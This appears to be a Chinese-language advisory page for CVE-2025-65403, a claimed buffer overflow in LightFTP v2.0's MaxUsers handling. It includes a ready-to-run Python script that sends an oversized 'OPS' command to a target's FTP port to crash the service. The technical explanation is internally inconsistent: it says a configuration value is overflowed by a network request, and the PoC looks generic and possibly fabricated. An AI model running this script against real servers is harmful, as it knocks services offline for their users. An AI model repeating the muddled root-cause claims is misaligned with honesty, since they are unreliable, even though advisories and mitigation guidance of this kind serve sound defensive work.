CVE-2025-65403 LightFTP MaxUsers缓冲区溢出导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-65403

漏洞类型

缓冲区溢出

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

LightFTP v2.0

漏洞概述

CVE-2025-65403是LightFTP FTP服务器软件中的一个缓冲区溢出漏洞，存在于g_cfg.MaxUsers组件中。LightFTP是一款轻量级的FTP服务器软件，被广泛应用于文件传输场景。该漏洞允许未经认证的远程攻击者通过构造恶意输入来触发缓冲区溢出条件，从而导致FTP服务崩溃，造成拒绝服务（DoS）影响。根据CVSS 3.1评分6.5（中危），该漏洞的攻击复杂度较低，无需特殊权限即可发起攻击，但需要一定的用户交互。由于可用性影响被评为高，这意味着攻击成功后将严重影响服务的可用性，给企业业务连续性带来风险。建议受影响的用户及时关注官方更新，采取相应的防护措施。

技术细节

该漏洞存在于LightFTP v2.0的g_cfg.MaxUsers组件中，MaxUsers参数用于控制FTP服务器的最大用户连接数。漏洞的根本原因在于该组件在处理用户输入时缺乏适当的边界检查，当攻击者通过FTP协议发送超出预期范围的恶意数据时，可能导致缓冲区溢出。具体来说，攻击者可以构造包含超长字符串或特殊格式数据的请求，当服务器解析MaxUsers配置值时，溢出的数据会覆盖相邻的内存区域，破坏程序的正常执行流程。这种内存破坏可能导致服务进程崩溃或产生未定义行为。由于该漏洞可通过网络远程利用且无需认证，攻击者可以轻松地向目标FTP服务器的21端口发送精心设计的请求包来触发漏洞。攻击成功后，FTP服务将无法响应正常用户的连接请求，造成服务中断。

攻击链分析

STEP 1

步骤1

攻击者扫描互联网或内网中运行LightFTP v2.0的服务器，识别目标FTP服务端口（默认21端口）

STEP 2

步骤2

攻击者构造包含超长字符串或特殊格式数据的恶意FTP请求，专门针对g_cfg.MaxUsers组件的缓冲区边界

STEP 3

步骤3

攻击者通过socket连接向目标FTP服务器发送精心设计的恶意数据包，无需任何认证

STEP 4

步骤4

服务器端LightFTP在解析MaxUsers配置值时触发缓冲区溢出，内存数据被破坏

STEP 5

步骤5

FTP服务进程崩溃或进入不可用状态，正常用户无法建立新的FTP连接，导致拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-65403 PoC - LightFTP MaxUsers Buffer Overflow
# This PoC demonstrates how to trigger the buffer overflow in LightFTP MaxUsers component

import socket
import sys

def create_ftp_payload():
    """Create malicious payload to overflow MaxUsers buffer"""
    # Crafted input that exceeds buffer size in g_cfg.MaxUsers
    # The overflow occurs when processing MaxUsers configuration
    overflow_data = b'OPS' + b'A' * 1000  # Malformed command with oversized data
    return overflow_data

def send_exploit(target_host, target_port=21):
    """Send exploit payload to LightFTP server"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        
        # Receive initial FTP banner
        banner = sock.recv(1024)
        print(f"[+] Received banner: {banner.decode().strip()}")
        
        # Send crafted payload to trigger buffer overflow in MaxUsers
        payload = create_ftp_payload()
        sock.send(payload)
        print(f"[+] Sent malicious payload ({len(payload)} bytes)")
        
        # Try to receive response
        try:
            response = sock.recv(1024)
            print(f"[*] Response: {response.decode().strip()}")
        except:
            print("[*] No response received - service may have crashed")
        
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 21
    
    print(f"[*] Exploiting CVE-2025-65403 on {target}:{port}")
    send_exploit(target, port)

影响范围

LightFTP v2.0

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1）使用防火墙或安全组规则限制对FTP服务（21端口）的访问，只允许必要的IP地址访问；2）禁用或限制匿名FTP访问；3）监控FTP服务器日志，设置异常流量告警；4）考虑使用负载均衡器或高可用架构提高服务韧性；5）定期备份配置文件和用户数据，以便快速恢复服务。建议密切关注LightFTP官方安全公告，及时应用官方发布的安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65403
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65403
3 Details https://www.cvedetails.com/cve/CVE-2025-65403/
4 VulDB https://vuldb.com/cve/CVE-2025-65403
5 Link https://github.com/hfiref0x/LightFTP
6 Link https://shimo.im/docs/9030JMJpv4IM4Nkw